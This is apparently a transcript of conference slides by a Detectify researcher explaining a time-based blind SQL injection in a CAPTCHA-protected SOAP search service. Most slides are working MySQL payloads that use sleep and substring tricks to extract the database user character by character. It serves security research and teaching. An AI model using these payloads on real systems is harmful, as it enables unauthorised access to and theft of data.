time based captcha protected sql injection through soap-webservice
TRANSCRIPT
detectifyTime based captcha protected SQL injection through SOAP-webservice
Frans Rosén @fransrosen
detectify
Search + CAPTCHA
detectify
Search for Bobby: '
detectify
Search: '-sleep(5)-'
detectify
CAPTCHA…
https://twitter.com/offensive_image/status/751191306500734976
detectify
Me need
1. DoaclearPoC–getdata2. Asfewrequestsaspossible3. FindALLthestorefronts!4. ???5. PROFIT!!!
detectify
user()
'-sleep((ascii(substring(user(),1,1))-90)/2)-'
detectify
user()
'-sleep((ascii(substring(user(),1,1))-90)/2)-'
(14*2)+90=118==v
detectify
Validate
'-(if(ascii(substring(user(),1,1))=117,sleep(3),1))-(if(ascii(substring(user(),1,1))=118,sleep(6),1))-(if(ascii(substring(user(),1,1))=119,sleep(9),1))-'
===v
detectify
Down on the @
'-sleep((ascii(substring(user(),21,1))-90)/2)-'
detectify
Host search
'-sleep((ascii(substring(user(),21,1))-46)*2)-'
detectify
Host search
0sforadot(T-4)/2 =2'-sleep((ascii(substring(user(),21,1))-46)*2)-'
detectify
Setup
detectify
Result
detectify
Other
https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf
SQLInjectionOptimizationandObfuscationTechniques
detectifyThanks!
Frans Rosén (@fransrosen) – www.detectify.com